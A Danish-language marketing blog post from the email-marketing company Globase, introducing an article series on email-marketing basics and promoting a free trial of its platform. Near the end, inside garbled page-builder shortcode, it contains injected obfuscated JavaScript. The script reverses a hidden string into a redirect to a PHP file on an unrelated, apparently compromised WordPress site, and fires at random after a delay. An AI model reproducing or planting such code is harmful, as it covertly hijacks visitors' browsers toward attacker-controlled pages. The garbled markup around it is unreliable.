Velkommen til en ny serie af introducerende artikler om e-mailmarketing, som du kan se frem til at modtage fra Globase, med en god blanding af facts, tips og tricks – uden at det koster dig en krone. Serien er tænkt som en guide særligt til dem, der måske stadig står lidt tøvende over for e-mailmarketing-udfordringerne – eller bare til dem, der godt kunne tænke sig at få bedre styr på disciplinens basale fundament. For mere avanceret rådgivning og vejledning, kan du altid tage fat i Globases dygtige og erfarne projektledere, der står klar til at hjælpe, give inspiration og finde løsninger. Det er dét, vi er her for.
Globase er nemlig sat i verden for at gøre det nemt for dig at bruge e-mailmarketing.
Og vi er stolte af at kunne sige, vores produkt er meget mere end et stykke software. Hos os får du sammen med vores marketing-platform et dedikeret hold af tekniske eksperter, projektledere og supportere, som kan hjælpe dig med rådgivning inden for e-mailmarketing og levere sikker håndtering af dine data.
Men for nu at komme til sagen: Sådan BRUGER og SKABER du GOD e-mailmarketing.
Det er efterhånden en hel disciplin i sig selv at skrive gode e-mails. Hver dag kommer der fra hele verden nyt om emnet. Vi er lidt fagligt nørdede og holder derfor et vågent øje med, hvad der rører sig. Den indsigt og viden vil vi gerne dele med dig. Vi trækker hovedpunkterne ud og giver dig links til at gå mere i dybden med emnet. Nemt og bekvemt.
Vi vil dog advare dig…
Udvikling kan være udfordrende, og du kan måske blive irriteret eller frustreret over, at din virksomhed ikke er kommet så langt i e-mailmarkedsføringens udviklingsfaser – men vi giver dig viden om faserne og værktøjer til, at du kan rykke din virksomhed, som du kan læse mere om i vores første artikel i serien: Evolutionen i e-mailmarketing.
Læser du med i de kommende artikler, vil du også komme til at lære mere om:
- Marketing automation, hvor du gennem et intelligent e-mail-flow får idéer til at supportere og sende målrettede, vel-timede, relevante e-mails til dine nuværende og kommende kunder både i forbindelse med førstegangssalg, kryds- og mersalg.
- Hvordan du kan bruge surveys til at lave godt og målrettet indhold til dine kunder ved at overveje 8 basisspørgsmål, inden du trykker på ”Send”-knappen.
- Du får også konkret viden om, hvad fagtermerne i e-mailmarketing betyder, og hvordan du ved at forstå termerne kan måle og forbedre dit ROI. Har du fx lave åbnings-, klik- eller bouncerater? Få tips og tricks til, hvad du kan gøre.
- Endelig får du et velment råd om at lægge al silotankegang til side, når det gælder dine kommunikationskanaler. Vær til stede, der hvor dine kunder befinder sig – også når det kommer til at få din e-mailmarketing til at interagere med de sociale medier.
Det er blot nogle af de emner, som vi vil berøre i de kommende uger. Vi håber, du vil følge med. Hvis du vil være sikker på at få det hele med, kan du tilmelde dig vores nyhedsbrev her – og du kan se mere fra vores blog her.
—
De to første artikler i serien er nu tilgængelige på vores hjemmeside. Find dem her:
#1: Evolutionen i e-mailmarketing
tomation.html”>#2: Marketing automation
”Vil
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom” text_color=”#ffffff” title_tag=”h3″ controls=”bottom” btn_link=”url:http%3A%2F%2Fwww.globase.dk%2Fprodukter-loesninger%2Fv3%2Fjeg-vil-gerne-vide-mere-om-globase-v3|||” btn_label=”Kontakt os nu!” btn_style=”outlined” btn_color=”white”]Kom i gang med den praktiske del af e-mailmarketing med det samme! Prøv vores marketing automation platform, Globase V3, gratis i 30 dage.